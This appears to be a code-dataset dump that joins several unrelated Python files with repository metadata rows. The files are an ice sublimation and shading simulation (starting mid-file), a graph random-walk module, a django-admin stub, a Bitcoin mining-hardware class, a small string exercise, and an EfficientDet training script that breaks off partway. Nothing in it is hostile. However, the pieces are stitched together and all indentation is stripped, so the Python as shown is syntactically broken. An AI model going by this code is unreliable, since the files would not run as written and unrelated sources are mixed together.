seg_section_fluxes = np.zeros((num_pts*3-1, num_section_pts+1), dtype=float)
# ^this is the heat fluxes up and down the vertical section
surf_T = seg_section_T[:,0]
surf_T_record = []
E_record = []
def diffuse_heat(flux_in, seg_section_T, seg_section_fluxes, seg_length):
"""
This little function attempts to implement transient 1D heat diffusion into
the ice surface for a single segment.
flux_in is a num_segments long array, and is the arriving
absorbed radiative flux (W/m). It does NOT include the reradiated part.
"""
deep_Ts = seg_section_T[:,-1].copy()
node_spacing = 0.002 # 0.3 mm
dt_int = 0.25 * node_spacing * node_spacing / coldest_diffusivity
# ^conservative von Neumann condition
repeats = int(tstep // dt_int) + 1
dt_int = tstep/repeats # again, conservative
# now do the loop:
for i in xrange(repeats):
# get the radiative loss:
fluxes_out = emissivity*stefan_boltz*seg_section_T[:,0]**4 #W/m**2
# get the gradients
grads = (seg_section_T[:,:-1] - seg_section_T[:,1:])/node_spacing
# get the diffusivities
link_mean_T = (seg_section_T[:,:-1] + seg_section_T[:,1:])/2.
alphas = np.interp(link_mean_T, temp_pts, diffusivities)
# calc the fluxes
seg_section_fluxes[:,1:-1] = alphas*grads # +ve OUT
# do the BCs
seg_section_fluxes[:,0] = (flux_in/seg_length-fluxes_out)
###seg_section_fluxes[:,-1] = seg_section_fluxes[:,-2]
# (free boundary at depth)
###now fixing T at depth...
seg_section_fluxes *= seg_length.reshape((seg_length.size,1)) # make them true fluxes
seg_section_T[:,:] += (seg_section_fluxes[:,:-1] -
seg_section_fluxes[:,1:])*dt_int
seg_section_T[:,-1] = deep_Ts ###
return seg_section_T[:,0] # return the surface Ts
for t in xrange(num_tsteps):
print(t)
seg_dx[:] = node_x_exp[1:]-node_x_exp[:-1]
seg_dz[:] = node_z_exp[1:]-node_z_exp[:-1]
seg_centx[:] = (node_x_exp[1:]+node_x_exp[:-1])/2.
seg_centz[:] = (node_z_exp[1:]+node_z_exp[:-1])/2.
seg_length[:] = np.sqrt(np.square(seg_dx)+np.square(seg_dz))
seg_angle[:] = np.arctan2(seg_dz, seg_dx)
# consistent w Cathles, ccw from vertical is +ve; describes the normal
seg_m[:] = seg_dz/seg_dx
seg_c[:] = node_z_exp[:-1] - seg_m*node_x_exp[:-1]
angle_factor = np.empty((seg_centx.size, seg_centx.size), dtype=float)
connectivity_matrix = np.empty_like(angle_factor, dtype=bool)
# hour_angle = 0. # midday
hour_angle = get_hour_angle(t*tstep)
if hour_angle is not None: #daytime
true_sun_zenith_angle = np.arccos(np.sin(latitude)*np.sin(
sun_declination) + np.cos(latitude)*np.cos(
sun_declination)*np.cos(hour_angle))
altitude_angle = np.pi/2. - true_sun_zenith_angle
sin_az = np.sin(hour_angle)*np.cos(sun_declination)/np.cos(altitude_angle)
true_sun_az_angle = np.arcsin(sin_az.clip(-1.,1.))
# ...per wiki & itacanet.org page
#print((np.sin(hour_angle),np.cos(sun_declination),np.cos(altitude_angle)))
eff_zenith = np.arctan(np.tan(true_sun_zenith_angle)*np.cos(true_sun_az_angle))
# ^this will break is true zenith == true az == np.pi/2 exactly
eff_intensity_factor = np.sqrt(np.cos(true_sun_zenith_angle)**2 +
(np.sin(true_sun_zenith_angle) *
np.cos(true_sun_az_angle))**2)
# ...assuming structures form E-W
else:
eff_zenith = 0.
eff_intensity_factor = 0. #no light allowed
## ^^this section now VERIFIED as well behaved!!
if eff_intensity_factor > 0.: # if it's night, this is all null
# derive the sky windows
# get angle between seg center and all other nodes:
# ******Note this section ignores looping, i.e., shading from other end
beta_L = np.zeros(num_pts*3, dtype=float)
beta_R = np.zeros_like(beta_L)
which_node_L = np.zeros(num_pts*3, dtype=int)
which_node_R = np.zeros_like(which_node_L)
poss_angles_L = np.zeros((num_pts*3, num_pts*3), dtype=float)
poss_angles_R = np.zeros_like(poss_angles_L)
for i in xrange(num_segments*3-1):
poss_angles_L[i, :(i+1)] = (np.arctan2(node_z_exp[:(i+1)]-seg_centz[i],
node_x_exp[:(i+1)]-seg_centx[i])-0.5*np.pi)
poss_angles_R[i, (i+1):] = (np.arctan2(node_z_exp[(i+1):]-seg_centz[i],
node_x_exp[(i+1):]-seg_centx[i])-0.5*np.pi)
poss_angles_L[i, :(i+1)] = np.where(poss_angles_L[i, :(i+1)] <= -np.pi,
poss_angles_L[i, :(i+1)]+2.*np.pi,
poss_angles_L[i, :(i+1)])
poss_angles_R[i, (i+1):] = np.where(poss_angles_R[i, (i+1):] <= -np.pi,
poss_angles_R[i, (i+1):]+2.*np.pi,
poss_angles_R[i, (i+1):])
which_node_L[i] = np.argmin(poss_angles_L[i, :(i+1)])
# min because they're +ve
which_node_R[i] = np.argmax(poss_angles_R[i, (i+1):]) + i + 1
# max because they're -ve
# final additions to put this into "real" IDs
beta_L[i] = poss_angles_L[i, :(i+2)].flatten()[which_node_L[i]]
beta_R[i] = poss_angles_R[i, (i+1):].flatten()[which_node_R[i]-i-1]
# assert np.all(np.less_equal(beta_R, 0.))
# assert np.all(np.greater_equal(beta_L, 0.))
# ...this actually isn't true in the general case... overhangs!
# But think the above still holds
# get illumination fraction
# if the beta angle is the same as the seg_angle, then whole thing
# is illuminated, or it's not (i.e., it's self shaded).
# Interesting cases arise when a vertex not at the ends of the segment
# can shade it
shaded_L = np.greater(eff_zenith, beta_L[:-1])
shaded_R = np.less(eff_zenith, beta_R[:-1])
center_illum = np.logical_not(np.logical_or(shaded_R,
shaded_L)).astype(float)
# ^this is the fraction we want
# find the points where we change from full to no illum of centers:
changed_illum_L = np.where(np.diff(shaded_L))[0] + 1
changed_illum_R = np.where(np.diff(shaded_R))[0] + 1
# ^there *can* be more than 1 ID in these arrays
angle_next_node_notL = np.arctan2(-node_z_exp[changed_illum_L]+node_z_exp[
which_node_L[changed_illum_L]],
-node_x_exp[changed_illum_L]+node_x_exp[
which_node_L[changed_illum_L]]
) - 0.5*np.pi
# A negative val here indicates the node looked AT ITSELF
# ...note this is actually the next node right, but relevant to the
# "L" labelled variables...!
# The ID for the segment left of the node is changed_illum_L-1
# The ID for the segment right of the node is changed_illum_L
for i in xrange(angle_next_node_notL.size):
if (eff_zenith > angle_next_node_notL[i]) and (
angle_next_node_notL[i] >= 0):
# the node is shadowed, and the segment TO ITS RIGHT is partially
# illuminated (i.e., it's illum is DECREASED from 1.)
center_illum[changed_illum_L[i]] -= 0.5*(1. - (beta_L[
changed_illum_L[i]] - eff_zenith)/(beta_L[changed_illum_L[i]] -
angle_next_node_notL[i]))
# use minus not times as it's possible we're further decreased on
# the same segment from the RHS
elif eff_zenith < angle_next_node_notL[i]:
# the node is illuminated, and the segment TO ITS LEFT is partially
# illuminated (i.e., it's illum is INCREASED from 0.)
center_illum[changed_illum_L[i]-1] += 0.5*(angle_next_node_notL[
i] - eff_zenith)/(
angle_next_node_notL[
i] - beta_L[
changed_illum_L[i]-1])
else: # self-shadowed seg or perfectly grazing light => no changes
pass
# repeat for the RHS
xdiff = node_x_exp[which_node_R[changed_illum_R]] - node_x_exp[
changed_illum_R]
angle_next_node_notR = np.arctan2(-node_z_exp[changed_illum_R] +
node_z_exp[which_node_R[
changed_illum_R]], xdiff) - 0.5*np.pi
for i in xrange(angle_next_node_notR.size):
# remember, angles are now ALL NEGATIVE
if eff_zenith < angle_next_node_notR[i]:
# node is shadowed, the segment to its left has its illum
# decreased from 1.
center_illum[
changed_illum_R[i]-1] -= 0.5*(eff_zenith -
angle_next_node_notR[i])/(
beta_R[changed_illum_R[i]-1] -
angle_next_node_notR[i])
# -ves hopefully sort themselves out
elif eff_zenith > angle_next_node_notR[i] and (
angle_next_node_notR[i] != beta_R[changed_illum_R[i]]):
# 2nd condition excl. self-shadowing
center_illum[
changed_illum_R[i]] += 0.5*(angle_next_node_notR[i] -
eff_zenith)/(
angle_next_node_notR[i] -
beta_R[changed_illum_R[i]])
else:
pass
# calc direct illumination terms:
part = center_illum * true_incoming_intensity * eff_intensity_factor *\
seg_length * np.cos(seg_angle-eff_zenith)
# calc reradiation:
rerad = seg_length * emissivity * stefan_boltz * surf_T**4
R_d = (true_albedo*part) + rerad
E_d = (1.-true_albedo)*part
# get the angle factor
cent_dists_to_all_nodes = np.sqrt(np.square(seg_centx.reshape((
seg_centx.size, 1)) - node_x_exp.reshape((1, node_x_exp.size))) +
np.square(seg_centz.reshape((seg_centz.size, 1)) -
node_z_exp.reshape((1, node_z_exp.size))))
arccos_frag = (np.square(cent_dists_to_all_nodes[:, :-1]) +
np.square(cent_dists_to_all_nodes[:, 1:]) -
np.square(seg_length))/(2.*cent_dists_to_all_nodes[:, :-1] *
cent_dists_to_all_nodes[:, 1:])
arccos_frag[arccos_frag > 1.] = 1.
arccos_frag[arccos_frag < -1.] = -1.
# ...some kind of rounding error was getting in here.
angle_factor[:, :] = np.arccos(arccos_frag)/np.pi
# angle_factor[np.eye(angle_factor.shape[0], dtype=bool)] = 0.
# ^this isn't necessary as we do it via the connectivity matrix
# now the connectivity matrix
# this is CRAZY slow, so only do it once every 20 steps! Form rarely
# changes fast enough for this to matter
# NB: the resampling scotches this. Might be possible to fudge it??
if True: # t % (num_tsteps//1) == 0:
# do segments face each other?
center_angles = (np.arctan2(seg_centz.reshape((1, seg_centz.size)) -
seg_centz.reshape((seg_centz.size, 1)),
seg_centx.reshape((1, seg_centx.size)) -
seg_centx.reshape((seg_centx.size, 1))) -
0.5*np.pi)
# note self gets -pi/2.
center_angles = np.where(center_angles <= -np.pi, center_angles+2.*np.pi,
center_angles)
angle_between = center_angles - seg_angle.reshape((seg_angle.size, 1))
connect_oneway = np.greater(np.cos(angle_between), 0.)
# connect_oneway = np.logical_and(connect_oneway, connect_oneway.T)
# ^ we do this below...
connect_oneway[np.eye(connect_oneway.shape[0], dtype=bool)] = False
##figure(0)
##plot(node_x_exp[:-1], np.sum(connect_oneway, axis=0))
# ^can't illuminate yourself. Parallel surfaces may or may not be true
# now line of sight. We'll have to do this the crude way, I think
# this is PAINFULLY SLOW
for i in xrange(num_pts*3-2):
for j in xrange(i+1, num_pts*3-1):
head_x = seg_centx[i]
head_z = seg_centz[i]
tail_x = seg_centx[j]
tail_z = seg_centz[j]
node_x_vals = node_x_exp[(i+1):(j+1)]
node_z_vals = node_z_exp[(i+1):(j+1)]
line_grad = (tail_z-head_z)/(tail_x-head_x)
line_const = head_z-line_grad*head_x
proj_z_vals = line_grad*node_x_vals + line_const
# ^the vals the nodes "would have" if on the line
if not np.logical_or(np.all(np.greater(proj_z_vals, node_z_vals)),
np.all(np.greater(node_z_vals, proj_z_vals))):
# ...not all above, or all below
# set the connectivity to 0
connect_oneway[i, j] = False
# the transposition below takes care of [j,i]
connectivity_matrix[:, :] = np.logical_and(
connect_oneway, connect_oneway.T)
# ^BOTH normals must point at each other
# now, solve the matrix:
A_ij = true_albedo*angle_factor.T*connectivity_matrix*seg_length
# ...Cathles had dropped the connectivity_matrix is his equ. A13
identity_less_A = np.identity(A_ij.shape[0]) - A_ij
R = np.linalg.solve(identity_less_A, R_d)
E = E_d + np.sum((1.-true_albedo) * seg_length *
connectivity_matrix*angle_factor.T * R,
axis=1)
else:
E = 0. # it's nighttime, baby
E_record.append(E)
surf_T = diffuse_heat(E, seg_section_T, seg_section_fluxes, seg_length)
surf_T_record.append(surf_T.mean())
# now we're going to implement Lebofsky's method for sublimation rate:
vaporP = 133.322368*np.power(10., -2445.5646/surf_T +
8.2312*np.log10(surf_T) - 0.0167706*surf_T +
1.20514e-5*np.square(surf_T) - 6.757169)
# now Hertz-Knudsen:
Hdot_perseg_timestime = vaporP * np.sqrt(0.0180154 /
(np.pi*8.3144621*surf_T)) / \
ice_density * tstep
### does there need to be a division by seg_length here?
#Hdot_perseg_timestime = E/(ice_density*L_subl*seg_length)*tstep
A_ij2 = np.identity(seg_length.size, dtype=float) * seg_length/3.
A_ij2[1:, 1:] += np.identity(seg_length.size-1,
dtype=float) * seg_length[:-1]/3.
A_ij2[0, 0] += seg_length[-1]/3.
# the factor of 2 arises as each node appears on 2 segments
# A_ij2[0, 0] = seg_length[0]/3.
# A_ij2[-1, -1] = seg_length[-1]/3. # invoke looped BCs
A_ij2[0, 1] = seg_length[0]/6.
A_ij2[0, -1] = seg_length[-1]/6.
A_ij2[-1, -2] = seg_length[-1]/6. # entries we'll miss otherwise
A_ij2[-1, 0] = seg_length[-2]/6.
for i in xrange(1, seg_length.size-1):
A_ij2[i, i-1] = seg_length[i-1]/6.
A_ij2[i, i+1] = seg_length[i]/6.
bdot_hyp = Hdot_perseg_timestime*seg_length/2.
bdot_x = bdot_hyp*np.sin(seg_angle) # formerly -ve, but didn't make sense
bdot_z = -bdot_hyp*np.cos(seg_angle) # for each seg
F_rhs_x = np.zeros(seg_length.size, dtype=float) # for each node
F_rhs_z = np.zeros(seg_length.size, dtype=float) # for each node
for (F, b) in zip((F_rhs_x, F_rhs_z), (bdot_x, bdot_z)):
F[0] = b[0] + b[-1] # invoking looped BCs
for i in xrange(1, F.size):
F[i] = b[i-1] + b[i] # why is this looking back not forward?
u_i = np.linalg.solve(A_ij2, F_rhs_x)
w_i = np.linalg.solve(A_ij2, F_rhs_z)
# disable these lines to test the resampling procedure...
node_x_exp[:-1] += u_i
node_z_exp[:-1] += w_i
# ...Cathles then regrids.
fn = interp.interp1d(node_x_exp, node_z_exp)
# node_x = init_node_x.copy()
# node_z = fn(node_x)
if mobile_pts is True:
# replace the above with mechanism to try to prevent bunching at tips:
# hard part is the new spacing of node_x
# get the total length:
seg_dx_temp = node_x_exp[(num_pts+1):(2*num_pts+1)]-node_x_exp[
num_pts:(2*num_pts)]
seg_dz_temp = node_z_exp[(num_pts+1):(2*num_pts+1)]-node_z_exp[
num_pts:(2*num_pts)]
# force the first and last pts to be effectively immobile:
# seg_dx_temp[0] = node_x_exp[num_pts+1] # node_x[0] = 0 always
seg_dx_temp[0] = node_x_exp[num_pts+1] - node_x_exp[num_pts]
# seg_dx_temp[-1] = array_length-node_x_exp[2*num_pts-1]
seg_dx_temp[-1] = node_x_exp[2*num_pts]-node_x_exp[2*num_pts-1]
# seg_dz_temp[0] = node_z_exp[num_pts+1] - fn(0.)
seg_dz_temp[0] = node_z_exp[num_pts+1] - node_z_exp[num_pts]
# seg_dz_temp[-1] = fn(array_length)-node_z_exp[2*num_pts-1]
seg_dz_temp[-1] = node_z_exp[2*num_pts]-node_z_exp[2*num_pts-1]
seg_length_temp = np.sqrt(np.square(seg_dx_temp) +
np.square(seg_dz_temp))
new_contour_cumlen[1:] = np.cumsum(seg_length_temp)
new_dl = new_contour_cumlen[-1]/num_pts
new_lengths = np.arange(0, new_dl*(num_pts+1), new_dl)
# rounding errors can appear here, so
if new_lengths.size > num_pts+1:
new_lengths = new_lengths[:-1]
assert new_lengths.size == num_pts+1
new_pos_byl = np.searchsorted(new_contour_cumlen, new_lengths[:-1])
# note that new elements get inserted BEFORE equal values => prob w 0
# so...
atstart = np.equal(new_contour_cumlen[new_pos_byl],
new_lengths[new_pos_byl])
atstart[-1] = False # don't move the last one!
new_pos_byl[atstart] += 1 # increment these into the next interval
prop_along_lines = (new_lengths[:-1] -
new_contour_cumlen[new_pos_byl-1])/(
new_contour_cumlen[new_pos_byl] -
new_contour_cumlen[new_pos_byl-1])
# now we can create the new node_x and node_z:
node_x[:] = node_x_exp[num_pts+new_pos_byl-1] + prop_along_lines*(
node_x_exp[num_pts+new_pos_byl] -
node_x_exp[num_pts+new_pos_byl-1])
# add some randomness
# DOING THIS ADDS SIGNIFICANT DIFFUSION!!!
offset = (np.random.rand(1.)-0.5)*array_length/num_pts
node_x += offset
# node_z = fn(node_x)
# The problem with the diffusion is getting in because the resampled
# pts are ALWAYS lower than the existing pts. The way to solve this is
# to try a quadratic resampling?
for i in xrange(node_x.size):
fnparam = np.polyfit(node_x_exp[(num_pts+new_pos_byl[i]-2):
(num_pts+new_pos_byl[i]+2)],
node_z_exp[(num_pts+new_pos_byl[i]-2):
(num_pts+new_pos_byl[i]+2)],
2)
# incorporates 1 seg on either side of the seg of interest (4 pts)
fnquad = np.poly1d(fnparam)
node_z[i] = fnquad(node_x[i])
else:
node_x[:] = node_x_exp[num_pts:(2*num_pts)]
node_z[:] = node_z_exp[num_pts:(2*num_pts)]
node_x_exp[num_pts:(2*num_pts)] = node_x
node_x_exp[:num_pts] = node_x - array_length
node_x_exp[(2*num_pts):] = node_x + array_length
node_z_exp[num_pts:(2*num_pts)] = node_z
node_z_exp[:num_pts] = node_z
node_z_exp[(2*num_pts):] = node_z
# # plot the new output
# if t % (num_tsteps//20) == 0:
# figure(1)
# plot(node_x, node_z)
# # check we're still running...
# if t % 100 == 0:
# print 'time ', t
deepest_elev[t] = node_z.min()
figure(1)
plot(init_node_x, init_node_z, 'k')
figure(2)
plot(node_x, node_z)
figure(3)
plot(init_node_x-init_node_x[np.argmin(init_node_z)], init_node_z-init_node_z.min(), 'k')
plot(node_x-node_x[np.argmin(node_z)], node_z-node_z.min(), 'r')
figure(4)
plot((np.arange(num_tsteps, dtype=float)+1.)*tstep, deepest_elev)
figure(5)
plot(node_x_exp, node_z_exp)
figure(6)
plot(node_x_exp[:-1], np.sum(connectivity_matrix, axis=0))
figure(7)
plot(node_x_exp[:-1], surf_T)
show()
|
[
"[email protected]"
] | |
9744dae7239f9c1835418cabf0cd0fdebe277c41
|
48c40649b84984eb4473f796ad1ec5a3294c1683
|
/LP/benchmark/methods/GATNE/walk.py
|
85ee1125073424eda2c4c02813dcfec381a7b00d
|
[
"MIT"
] |
permissive
|
danielTLevy/HGB
|
8260f23dd1cabc41df255dd8d5533e7aaca07339
|
3aca9c4099ba7ea0bcb68ef00ef19bab8dda638a
|
refs/heads/master
| 2023-08-06T10:03:39.786587 | 2021-09-29T08:12:18 | 2021-09-29T08:12:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,135 |
py
|
import random
import multiprocessing
from tqdm import tqdm
def walk(args):
walk_length, start, schema = args
# Simulate a random walk starting from start node.
rand = random.Random()
if schema:
schema_items = schema.split('-')
assert schema_items[0] == schema_items[-1]
walk = [start]
while len(walk) < walk_length:
cur = walk[-1]
candidates = []
for node in G[cur]:
if schema == '' or node_type[node] == schema_items[len(walk) % (len(schema_items) - 1)]:
candidates.append(node)
if candidates:
walk.append(rand.choice(candidates))
else:
break
return [str(node) for node in walk]
def initializer(init_G, init_node_type):
global G
G = init_G
global node_type
node_type = init_node_type
class RWGraph():
def __init__(self, nx_G, node_type_arr=None, num_workers=16):
self.G = nx_G
self.node_type = node_type_arr
self.num_workers = num_workers
def node_list(self, nodes, num_walks):
for loop in range(num_walks):
for node in nodes:
yield node
def simulate_walks(self, num_walks, walk_length, schema=None):
all_walks = []
nodes = list(self.G.keys())
random.shuffle(nodes)
if schema is None or schema=='':
with multiprocessing.Pool(self.num_workers, initializer=initializer, initargs=(self.G, self.node_type)) as pool:
all_walks = list(pool.imap(walk, ((walk_length, node, '') for node in tqdm(self.node_list(nodes, num_walks))), chunksize=256))
else:
schema_list = schema.split(',')
for schema_iter in schema_list:
with multiprocessing.Pool(self.num_workers, initializer=initializer, initargs=(self.G, self.node_type)) as pool:
walks = list(pool.imap(walk, ((walk_length, node, schema_iter) for node in tqdm(self.node_list(nodes, num_walks)) if schema_iter.split('-')[0] == self.node_type[node]), chunksize=512))
all_walks.extend(walks)
return all_walks
|
[
"[email protected]"
] | |
a2d3275ab3d2e66630d134701f09749e04fb0c2a
|
da87dbd0e4558f5e176846eea7fb6d4d64daa292
|
/myenv/bin/django-admin.py
|
6a82dadd00ee09598ba4593bd6fc7e3fd4b940c3
|
[] |
no_license
|
Aravinthvvs/DjangoProjects
|
5b617af0b3e6197bb4173131dc879e013b1f4db7
|
3f5ea5e1abcf8d2c5fb5c03125bfc68c52094010
|
refs/heads/master
| 2020-04-20T14:51:51.845476 | 2019-02-03T12:32:09 | 2019-02-03T12:32:09 | 168,911,841 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 154 |
py
|
#!/Users/aravinthvvs/myDjango/myenv/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
[
"[email protected]"
] | |
b4335a5f81c3eca54da490e902cb886118f575f6
|
d7bcd4020efd8303ec42e9174b4822cd77b7df90
|
/hardware.py
|
872ba5fa8324e86febdd4975ef9942c32bb6f720
|
[] |
no_license
|
daggerhashimoto/btcpow
|
d147d4617815e9e344be5d51068a073966ece503
|
fa706cd72be35020a0ed6d52e46d321e35719746
|
refs/heads/master
| 2021-05-26T15:27:02.829112 | 2014-02-20T04:32:19 | 2014-02-20T04:32:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,080 |
py
|
#!/usr/bin/env python
from datetime import date
# Simple class to represent a piece of hardware
class hw:
def __init__(self, name, d, hashes, price, power):
self.name = name
self.date = d
self.hashes = hashes
self.price = price
self.power = power
self.hash_efficiency = hashes / price
self.power_efficiency = hashes / power
self.total_units = 0
self.embodied_energy = 0
self.on = True
def new_cap(self, capacity, embodied_energy_per_rig):
new_units = capacity / self.hashes
self.total_units += new_units
self.embodied_energy += embodied_energy_per_rig * new_units
def running(self, start, end, network_hashrate, usd_prices, electricity_price):
# Assume that a rig is turned off it fails to cover its power costs for
# an entire generation of hardware. This assumes miners are slightly
# bullish about the future price of BTC, which fits their psychology
# and is rational given BTC's deflationary monetary policy algorithm
proportion = self.hashes / network_hashrate
for (d,btc_price) in usd_prices:
if d >= start and d <= end:
payoff = 144. * 25 * btc_price
unit_payoff = proportion * btc_price
on = (unit_payoff / self.power) > electricity_price
#print self.name, "pays", unit_payoff * 3600 * 24, "/day and is", on ,
#print (unit_payoff / self.power), "dollars per joule"
if on:
# The rig paid or its electicity this period, so it will
# keep running until new hardware is out
if not self.on:
print self.name, "HAS TURNED BACK ON"
self.on = True
return True
if self.on:
print self.name, "now off (%f%% of network)" % (proportion * self.total_units * 100), "unit payoff", unit_payoff *3600* 24, "/day"
self.on = False
return False
|
[
"[email protected]"
] | |
79da1f5960636d02fb36de8a0246c12483334113
|
67efa3f44b809984bc4433481f13b4b84f48fa30
|
/task1/task1.py
|
be34b7ed899f3ac6bc5b0e3e45a2bf30d41f9af6
|
[] |
no_license
|
Boltivets-Dmitro/python_practice
|
9aaff1c66ad0e86e00fb5c88288864dde3d1ff4b
|
3b18cb504e2f45ca206120da7d4d1c522292fc6f
|
refs/heads/main
| 2023-06-18T12:29:00.685450 | 2021-07-07T13:52:40 | 2021-07-07T13:52:40 | 383,112,148 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 625 |
py
|
import re
str = input("\nВведіть рядок: ")
words = ''.join([i for i in str if not i.isdigit()])
numbers = re.findall(r'\d+', str)
numbers = [int(i) for i in numbers]
print("\nРядок без чисел:", words)
print("Числа з рядка:", numbers)
WithLarge = ' '.join(words[0].upper() + words[1:-1] + words[-1:].upper() for words in words.split())
print("\nРядок після змін:", WithLarge)
numbers.remove(max(numbers))
numberIndex = [numbers[i]**i for i in range(0,len(numbers))]
print("Масив чисел в степені по їх індексу:", numberIndex)
print("\n")
|
[
"[email protected]"
] | |
f9f05ec8091310728dec15ae327849436e548ada
|
2a51ebbb11d2e86efeb6b4c406c9ef9e8dd161a1
|
/train.py
|
2cbc2934ea1f8e2507024a040d0bdd5582945439
|
[
"MIT"
] |
permissive
|
MaLiXiaoGuo/efficientdet-pytorch
|
37f6099d24532f2fcf255d9617841de5d9507248
|
6a013481f9264a065ff1e3c5affe3102ef6066ce
|
refs/heads/master
| 2023-04-04T16:57:56.542193 | 2021-04-07T10:57:42 | 2021-04-07T10:57:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,362 |
py
|
#-------------------------------------#
# 对数据集进行训练
#-------------------------------------#
import os
import time
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from tqdm import tqdm
from nets.efficientdet import EfficientDetBackbone
from nets.efficientdet_training import FocalLoss
from utils.dataloader import EfficientdetDataset, efficientdet_dataset_collate
def get_lr(optimizer):
for param_group in optimizer.param_groups:
return param_group['lr']
#---------------------------------------------------#
# 获得类
#---------------------------------------------------#
def get_classes(classes_path):
'''loads the classes'''
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def fit_one_epoch(net,focal_loss,epoch,epoch_size,epoch_size_val,gen,genval,Epoch,cuda):
total_r_loss = 0
total_c_loss = 0
total_loss = 0
val_loss = 0
net.train()
with tqdm(total=epoch_size,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen):
if iteration >= epoch_size:
break
images, targets = batch[0], batch[1]
with torch.no_grad():
if cuda:
images = Variable(torch.from_numpy(images).type(torch.FloatTensor)).cuda()
targets = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)).cuda() for ann in targets]
else:
images = Variable(torch.from_numpy(images).type(torch.FloatTensor))
targets = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)) for ann in targets]
optimizer.zero_grad()
_, regression, classification, anchors = net(images)
loss, c_loss, r_loss = focal_loss(classification, regression, anchors, targets, cuda=cuda)
loss.backward()
optimizer.step()
total_loss += loss.item()
total_r_loss += r_loss.item()
total_c_loss += c_loss.item()
pbar.set_postfix(**{'Conf Loss' : total_c_loss / (iteration+1),
'Regression Loss' : total_r_loss / (iteration+1),
'lr' : get_lr(optimizer)})
pbar.update(1)
net.eval()
print('Start Validation')
with tqdm(total=epoch_size_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(genval):
if iteration >= epoch_size_val:
break
images_val, targets_val = batch[0], batch[1]
with torch.no_grad():
if cuda:
images_val = Variable(torch.from_numpy(images_val).type(torch.FloatTensor)).cuda()
targets_val = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)).cuda() for ann in targets_val]
else:
images_val = Variable(torch.from_numpy(images_val).type(torch.FloatTensor))
targets_val = [Variable(torch.from_numpy(ann).type(torch.FloatTensor)) for ann in targets_val]
optimizer.zero_grad()
_, regression, classification, anchors = net(images_val)
loss, c_loss, r_loss = focal_loss(classification, regression, anchors, targets_val, cuda=cuda)
val_loss += loss.item()
pbar.set_postfix(**{'total_loss': val_loss / (iteration + 1)})
pbar.update(1)
print('Finish Validation')
print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
print('Total Loss: %.4f || Val Loss: %.4f ' % (total_loss/(epoch_size+1),val_loss/(epoch_size_val+1)))
print('Saving state, iter:', str(epoch+1))
torch.save(model.state_dict(), 'logs/Epoch%d-Total_Loss%.4f-Val_Loss%.4f.pth'%((epoch+1),total_loss/(epoch_size+1),val_loss/(epoch_size_val+1)))
return val_loss/(epoch_size_val+1)
#----------------------------------------------------#
# 检测精度mAP和pr曲线计算参考视频
# https://www.bilibili.com/video/BV1zE411u7Vw
#----------------------------------------------------#
if __name__ == "__main__":
#-------------------------------------------#
# 训练前,请指定好phi和model_path
# 二者所使用Efficientdet版本要相同
#-------------------------------------------#
phi = 0
#-------------------------------------------#
# 根据phi的值选择输入图片的大小
#-------------------------------------------#
input_sizes = [512, 640, 768, 896, 1024, 1280, 1408, 1536]
input_shape = (input_sizes[phi], input_sizes[phi])
#-------------------------------#
# 是否使用Cuda
# 没有GPU可以设置成False
#-------------------------------#
Cuda = True
#----------------------------------------------------#
# classes的路径非常重要
# 训练前一定要修改classes_path,使其对应自己的数据集
#----------------------------------------------------#
classes_path = 'model_data/voc_classes.txt'
#----------------------------------------------------#
# 获取classes
#----------------------------------------------------#
class_names = get_classes(classes_path)
num_classes = len(class_names)
#------------------------------------------------------#
# 创建EfficientDet模型
# 训练前一定要修改classes_path和对应的txt文件
#------------------------------------------------------#
model = EfficientDetBackbone(num_classes,phi)
#------------------------------------------------------#
# 权值文件请看README,百度网盘下载
#------------------------------------------------------#
model_path = "model_data/efficientdet-d0.pth"
print('Loading weights into state dict...')
model_dict = model.state_dict()
pretrained_dict = torch.load(model_path)
pretrained_dict = {k: v for k, v in pretrained_dict.items() if np.shape(model_dict[k]) == np.shape(v)}
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
print('Finished!')
net = model.train()
if Cuda:
net = torch.nn.DataParallel(model)
cudnn.benchmark = True
net = net.cuda()
efficient_loss = FocalLoss()
#----------------------------------------------------#
# 获得图片路径和标签
#----------------------------------------------------#
annotation_path = '2007_train.txt'
#----------------------------------------------------------------------#
# 验证集的划分在train.py代码里面进行
# 2007_test.txt和2007_val.txt里面没有内容是正常的。训练不会使用到。
# 当前划分方式下,验证集和训练集的比例为1:9
#----------------------------------------------------------------------#
val_split = 0.1
with open(annotation_path) as f:
lines = f.readlines()
np.random.seed(10101)
np.random.shuffle(lines)
np.random.seed(None)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
#------------------------------------------------------#
# 主干特征提取网络特征通用,冻结训练可以加快训练速度
# 也可以在训练初期防止权值被破坏。
# Init_Epoch为起始世代
# Freeze_Epoch为冻结训练的世代
# Epoch总训练世代
# 提示OOM或者显存不足请调小Batch_size
#------------------------------------------------------#
if True:
#--------------------------------------------#
# BATCH_SIZE不要太小,不然训练效果很差
#--------------------------------------------#
lr = 1e-3
Batch_size = 8
Init_Epoch = 0
Freeze_Epoch = 50
optimizer = optim.Adam(net.parameters(),lr,weight_decay=5e-4)
lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.5, patience=2, verbose=True)
train_dataset = EfficientdetDataset(lines[:num_train], (input_shape[0], input_shape[1]), is_train=True)
val_dataset = EfficientdetDataset(lines[num_train:], (input_shape[0], input_shape[1]), is_train=False)
